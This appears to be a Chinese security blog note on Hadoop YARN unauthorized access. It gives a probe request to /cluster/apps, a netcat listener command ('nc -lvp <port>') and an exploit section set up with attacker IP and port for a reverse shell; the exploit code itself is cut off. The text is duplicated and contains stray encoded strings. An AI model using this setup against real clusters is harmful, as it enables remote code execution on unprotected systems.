【笔记】Hadoop未授权访问
前言
Hadoop未授权访问
poc
- 查看页面是否正常显示,而不是报404
1 | GET http://127.0.0.1:80/cluster/apps |
建立监听
1 | nc -lvp <port> |
exp
http://127.0.0.1:80:目标Hadoop的Web页面的URL,可以是域名也可以是IP和端口号<ip>:攻击者IP地址<port>:攻击者端口号
1 | import requests |
57uv6Z6g55qE5Y2a5a6i
MS4wLjABAAAA5qMD8Gzdcgq7HXUOviKB59i0-ybJ59jJvNzyaPt5XOsVNqP6DU7WLcoAXvdxvYdp💗
本站所有文章仅作技术研究,请勿非法破坏,请遵守相关法律法规,后果自负
Hadoop未授权访问
1 | GET http://127.0.0.1:80/cluster/apps |
1 | nc -lvp <port> |
http://127.0.0.1:80:目标Hadoop的Web页面的URL,可以是域名也可以是IP和端口号<ip>:攻击者IP地址<port>:攻击者端口号
1 | import requests |